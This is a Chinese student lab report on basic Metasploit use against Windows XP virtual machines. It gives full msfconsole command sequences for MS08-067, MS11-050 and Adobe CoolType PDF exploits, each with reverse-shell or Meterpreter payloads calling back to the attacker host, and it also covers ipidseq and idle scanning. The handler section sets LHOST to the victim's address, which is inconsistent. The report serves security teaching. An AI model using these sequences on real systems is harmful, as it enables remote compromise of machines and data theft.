1. 程式人生 > >20155318 《網絡攻防》Exp5 MSF基礎應用

20155318 《網絡攻防》Exp5 MSF基礎應用

我們 時間 olt 反向 ids lis pro exp port

20155318 《網絡攻防》Exp5 MSF基礎應用

基礎問題

  • 用自己的話解釋什麽是exploit,payload,encode?
  • exploit就相當於是載具,將真正要負責攻擊的代碼傳送到靶機中
  • payload也就相當於載荷,相當於我們之前實驗的後門,exploit把它傳送到靶機中後,它就負責執行相應的攻擊代碼。
  • encode也就是編碼,主要是為了避免payload中壞字符影響功能,其次是為了偽裝,不讓殺毒軟件很輕易的就發現payload是攻擊代碼。

實驗步驟

Windows服務滲透攻擊——MS08-067安全漏洞

  • 攻擊機:kali,ip:192.168.153.129
  • 靶機:windows XP SP3(English),IP地址是192.168.153.130
  • 在kali輸入msfconsole進入控制臺後依次輸入以下指令:

    use exploit/windows/smb/ms08_067_netapi
    set payload generic/shell_reverse_tcp//tcp反向回連
    set LHOST 192.168.153.129//此IP是kali的IP
    set LPORT 5318//端口
    set RHOST 192.168.153.130//此IP是靶機WIN XP的IP,特定漏洞端口已經固定
    set target 0
    exploit//進行攻擊
  • 技術分享圖片

  • 建立會話,攻擊結果如下:
  • 技術分享圖片

針對瀏覽器的攻擊:MS11-050

  • 攻擊機:kali,IP地址是192.168.153.129
  • 靶機:Windows XP Professional SP3 簡體中文,IP地址是192.168.153.131
    在攻擊機kali輸入msfconsole進入控制臺,依次輸入以下指令:

    msf > use windows/browser/ms11_050_mshtml_cobjectele
    msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回連
    msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.153.129 //攻擊機ip
    msf exploit(ms11_050_cobjectelement) > set LPORT 5318 //攻擊端口固定
    msf exploit(ms11_050_cobjectelement) > set URIPATH 5318lxy //統一資源標識符路徑設置
    msf exploit(ms11_050_cobjectelement) > exploit

    技術分享圖片

  • 在靶機訪問http://192.168.153.129:8080/5318lxy
  • 技術分享圖片

  • 會提示windows為了保護計算機已經關閉此程序
  • 技術分享圖片

  • 將internet選項中和安全有關的都降級、關閉,允許運行和安裝軟件
  • 技術分享圖片

  • 再次訪問,還是失敗
  • 技術分享圖片

針對客戶端的攻擊:adobe_toolbutton

  • 攻擊機:kali,ip:192.168.153.129
  • 靶機:Windows XP Professional SP3 簡體中文,IP地址是192.168.153.131
  • 在msf下用search
  • 技術分享圖片

  • 依次輸入以下指令:

    msf > use windows/fileformat/adobe_cooltype_sing
    msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回連
    msf exploit(adobe_cooltype_sing) > set LHOST 192.168.153.129 //攻擊機ip
    msf exploit(adobe_cooltype_sing) > set LPORT 5318 //攻擊端口
    msf exploit(adobe_cooltype_sing) > set FILENAME exp5_5318.pdf //設置生成pdf文件的名字
    msf exploit(adobe_cooltype_sing) > exploit //攻擊
  • 成功生成exp5_5318.pdf:
  • 技術分享圖片

  • 技術分享圖片

  • 將pdf文件傳送或拷貝到靶機上後,在kali上輸入back退出當前模塊,進入監聽模塊,輸入以下命令:

    msf > use exploit/multi/handler //進入監聽模塊
    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向連接
    msf exploit(handler) > set LHOST 192.168.153.131 //攻擊機ip
    msf exploit(handler) > set LPORT 5318 //攻擊端口固定
    msf exploit(handler) > exploit
  • 然後在靶機上打開20155312.pdf文件
  • 技術分享圖片

  • 運行後,回連成功
  • 技術分享圖片

  • 運行ipconfig命令
  • 技術分享圖片

  • 靶機關閉pdf文件,主機失去權限
  • 技術分享圖片

應用任何一個輔助模塊:ipidseq

ipidseq
  • 功能:掃描網段中的存活ip,它會識別被發現主機的IPID(用於跟蹤IP包的次序的一種技術)序列模式,並且表示出哪些是0、隨機或遞增的。

  • 擁有遞增的IPID的空閑(空閑是指該主機在特定時間內不向網絡發送數據包)主機(即顯示為Incremental!的條目),不會被網絡上的其它主機嚴重影響,可以用來進行TCP空閑掃描。

  • TCP空閑掃描:是一種高級的nmap掃描方式,這種掃描方式能讓我們冒充網絡上另一臺主機的IP地址對目標進行更為隱秘的掃描。

  • 具體流程
  • 攻擊機:kali,IP地址是192.168.153.132
  • 靶機:Windows XP Professional SP3 簡體中文,IP地址是192.168.153.131
  • use auxiliary/scanner/ip/ipidseq
  • 查看需要設置的參數,設置完成後確認一下,然後就可以開始exploit了。
  • 技術分享圖片

  • 設為對單一目標主機的掃描
  • 技術分享圖片

  • 技術分享圖片

  • 對指定網段的主機進行掃描:
  • 技術分享圖片

實驗總結

  • 本次實驗我學會了MSF工具的一些常用指令,了解六個模塊用法,整體實驗流程並不復雜,但是使用瀏覽器的那個攻擊我沒有成功,嘗試了其他多種方法也不行,打算等假期結束後再繼續嘗試。
  • 離實戰還缺些什麽技術或步驟?
  • 目前都只是針對XP系統進行攻擊,還不能直接對現在的操作系統進行攻擊,但是攻擊原理應該是相同的。

20155318 《網絡攻防》Exp5 MSF基礎應用